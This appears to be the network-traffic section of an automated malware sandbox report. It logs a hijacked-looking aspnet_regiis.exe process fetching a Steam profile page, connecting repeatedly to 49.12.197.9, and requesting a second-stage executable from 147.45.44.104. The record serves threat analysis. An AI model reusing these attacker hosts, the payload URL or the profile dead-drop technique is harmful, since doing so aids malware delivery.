                                                                                                                                                                  Oct 3, 2024 03:36:19.408257008 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.408303976 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.425776005 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.425793886 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.425955057 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.425971031 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.426054955 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.437850952 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.437868118 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.438152075 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.438165903 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.438298941 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.455559969 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.455575943 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.455887079 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.455903053 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.455981016 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.465925932 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.465943098 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.466123104 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.466146946 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.466228008 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.473042011 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.473056078 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.473198891 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.473212957 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.473293066 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.484735012 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.484747887 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.484889030 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.484903097 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.484975100 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.494110107 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.494124889 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.494297028 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.494309902 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.494391918 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.498523951 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.498537064 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.498681068 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.498693943 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.498768091 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.517508984 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.517529964 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.517843008 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.517884016 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.517939091 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.531948090 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.531961918 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.532054901 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.532062054 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.532219887 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.542205095 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.542217970 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.542370081 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.542402983 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.542578936 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.552666903 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.552680969 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.552826881 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.552843094 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.553011894 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.559787989 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.559802055 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.559940100 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.559953928 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.560169935 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.571491957 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.571508884 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.571604013 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.571630001 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.571686983 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.581173897 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.581190109 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.581435919 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.581449986 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.581538916 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.585320950 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.585335970 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.585503101 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.585515976 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.585607052 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.604284048 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.604314089 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.604444981 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.604453087 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.604497910 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.615462065 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.615544081 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.615592003 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.615595102 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.615653038 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.616485119 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.616503954 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:20.191015005 CEST49739443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:20.191065073 CEST4434973949.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:20.191138983 CEST49739443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:20.191371918 CEST49739443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:20.191391945 CEST4434973949.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:20.837703943 CEST4434973949.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:20.838687897 CEST49739443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:20.863629103 CEST49739443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:20.863662004 CEST4434973949.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:20.865086079 CEST49739443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:20.865106106 CEST4434973949.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:20.865135908 CEST49739443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:20.865153074 CEST4434973949.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:21.475578070 CEST49740443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:21.475658894 CEST4434974049.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:21.475754023 CEST49740443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:21.476023912 CEST49740443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:21.476052999 CEST4434974049.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:21.700383902 CEST4434973949.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:21.700445890 CEST49739443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:21.700452089 CEST4434973949.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:21.700495958 CEST49739443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:21.701292038 CEST49739443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:21.701308966 CEST4434973949.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:22.145998955 CEST4434974049.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:22.146205902 CEST49740443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:22.146548033 CEST49740443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:22.146576881 CEST4434974049.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:22.148216009 CEST49740443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:22.148228884 CEST4434974049.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:22.848426104 CEST4434974049.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:22.848449945 CEST4434974049.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:22.848519087 CEST4434974049.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:22.848515034 CEST49740443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:22.848515034 CEST49740443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:22.848582029 CEST49740443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:22.848720074 CEST49740443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:22.848754883 CEST4434974049.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:22.850877047 CEST49741443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:22.850919008 CEST4434974149.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:22.850986958 CEST49741443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:22.851145983 CEST49741443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:22.851161003 CEST4434974149.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:23.489511013 CEST4434974149.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:23.489607096 CEST49741443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:23.669672012 CEST49741443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:23.669694901 CEST4434974149.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:23.671262980 CEST49741443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:23.671268940 CEST4434974149.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:24.341264009 CEST4434974149.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:24.341295958 CEST4434974149.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:24.341373920 CEST4434974149.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:24.341449022 CEST49741443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:24.341507912 CEST49741443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:24.341852903 CEST49741443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:24.341869116 CEST4434974149.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:24.365010023 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:24.365102053 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:24.365179062 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:24.365403891 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:24.365437031 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:25.031275988 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:25.031403065 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:25.031825066 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:25.031836033 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:25.033519983 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:25.033525944 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:25.736449957 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:25.736530066 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:25.736572981 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:25.736610889 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:25.737541914 CEST49743443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:25.737560987 CEST4434974349.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:26.436460018 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:26.436506033 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:26.436587095 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:26.436815023 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:26.436827898 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:27.088272095 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:27.088335037 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:27.088792086 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:27.088802099 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:27.090528011 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:27.090533972 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:27.090615988 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:27.090639114 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:27.090643883 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:27.090647936 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:27.090714931 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:27.090739965 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:27.090847969 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:27.090872049 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:27.090924025 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:27.090941906 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:28.294750929 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:28.294817924 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:28.294887066 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:28.295104980 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:28.295403004 CEST49744443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:28.295422077 CEST4434974449.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:28.339123964 CEST49745443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:28.339159012 CEST4434974549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:28.339304924 CEST49745443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:28.339535952 CEST49745443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:28.339546919 CEST4434974549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:28.988395929 CEST4434974549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:28.988557100 CEST49745443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:28.988972902 CEST49745443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:28.988986015 CEST4434974549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:28.990804911 CEST49745443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:28.990814924 CEST4434974549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:29.759342909 CEST4434974549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:29.759426117 CEST4434974549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:29.759475946 CEST49745443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:29.759500980 CEST49745443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:29.759757996 CEST49745443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:29.759773016 CEST4434974549.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:29.762850046 CEST4974680192.168.2.6147.45.44.104
                                                                                                                                                                  Oct 3, 2024 03:36:29.767707109 CEST8049746147.45.44.104192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:29.767805099 CEST4974680192.168.2.6147.45.44.104
                                                                                                                                                                  Oct 3, 2024 03:36:29.767966032 CEST4974680192.168.2.6147.45.44.104
                                                                                                                                                                  Oct 3, 2024 03:36:29.772747993 CEST8049746147.45.44.104192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:30.410010099 CEST8049746147.45.44.104192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:30.410109997 CEST4974680192.168.2.6147.45.44.104

                                                                                                                                                                  UDP Packets

                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                  Oct 3, 2024 03:35:51.415795088 CEST6548853192.168.2.61.1.1.1
                                                                                                                                                                  Oct 3, 2024 03:35:51.434575081 CEST53654881.1.1.1192.168.2.6

                                                                                                                                                                  DNS Queries

                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                  Oct 3, 2024 03:35:51.415795088 CEST192.168.2.61.1.1.10x174eStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                                                                                                  DNS Answers

                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                  Oct 3, 2024 03:35:51.434575081 CEST1.1.1.1192.168.2.60x174eNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false

                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                  • steamcommunity.com
                                                                                                                                                                  • 49.12.197.9
                                                                                                                                                                  • 147.45.44.104

                                                                                                                                                                  HTTP Packets

                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  0192.168.2.649746147.45.44.104805576C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Oct 3, 2024 03:36:29.767966032 CEST183OUTGET /ldms/a43486128347.exe HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                  Host: 147.45.44.104
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Oct 3, 2024 03:36:30.410010099 CEST314INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:36:30 GMT
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  Content-Length: 13
                                                                                                                                                                  Last-Modified: Thu, 03 Oct 2024 01:25:21 GMT
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Keep-Alive: timeout=120
                                                                                                                                                                  ETag: "66fdf281-d"
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  Data Raw: 55 6e 6b 6e 6f 77 6e 20 65 72 72 6f 72
                                                                                                                                                                  Data Ascii: Unknown error


                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  0192.168.2.649721104.102.49.2544435576C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-10-03 01:35:52 UTC119OUTGET /profiles/76561199780418869 HTTP/1.1
                                                                                                                                                                  Host: steamcommunity.com
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  2024-10-03 01:35:52 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                  Server: nginx
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Date: Thu, 03 Oct 2024 01:35:52 GMT
                                                                                                                                                                  Content-Length: 34879
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Set-Cookie: sessionid=55e4903681e22a91514c299f; Path=/; Secure; SameSite=None
                                                                                                                                                                  Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                  2024-10-03 01:35:52 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
